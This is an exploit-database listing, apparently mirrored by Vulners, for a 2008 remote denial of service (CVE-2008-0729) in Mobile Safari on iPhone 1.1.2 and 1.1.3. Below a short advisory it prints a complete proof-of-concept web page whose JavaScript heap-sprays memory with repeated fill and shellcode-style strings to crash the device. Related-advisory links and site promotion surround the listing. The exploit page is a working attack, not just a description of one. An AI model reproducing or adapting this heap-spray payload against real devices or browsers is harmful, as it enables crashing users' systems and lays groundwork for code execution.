Lucene search
+L

Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service

🗓️ 24 Jan 2008 00:00:00Reported by fuzionType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 22 Views

Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service vulnerability affecting iPhone 1.1.2 and 1.1.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Apple iOS < 1.1.4 DoS
14 Mar 200800:00
nessus
cve
CVE
CVE-2008-0729
12 Feb 200820:00
cve
cvelist
Cvelist
CVE-2008-0729
12 Feb 200820:00
cvelist
euvd
EUVD
EUVD-2008-0739
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-0729
12 Feb 200821:00
nvd
prion
Prion
Design/Logic Flaw
12 Feb 200821:00
prion
ptsecurity
Positive Technologies
PT-2008-2347 · Apple · Apple Safari
12 Feb 200800:00
ptsecurity
source: https://www.securityfocus.com/bid/27442/info

Apple iPhone is prone to a remote denial-of-service vulnerability.

Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause a kernel panic, crashing the device. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.

iPhone 1.1.2 and 1.1.3 are affected; other versions may also be vulnerable.

<html><body><script> function Demo() { var shellcode; var addr; var fill; alert('attempting a crash!'); shellcode = unescape('%u0c0c'); fill = unescape('%ucccc'); addr = 0x02020202; var b = fill; while (b.length <= 0x40000) b+=b; var c = new Array(); for (var i =0; i<36; i++) { c[i] = b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode + b.substring(0, 0x100000 - shellcode.length) + shellcode; } } </script> <input type='button' onClick='Demo()' value='Go!'> </body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.1
EPSS0.08074
22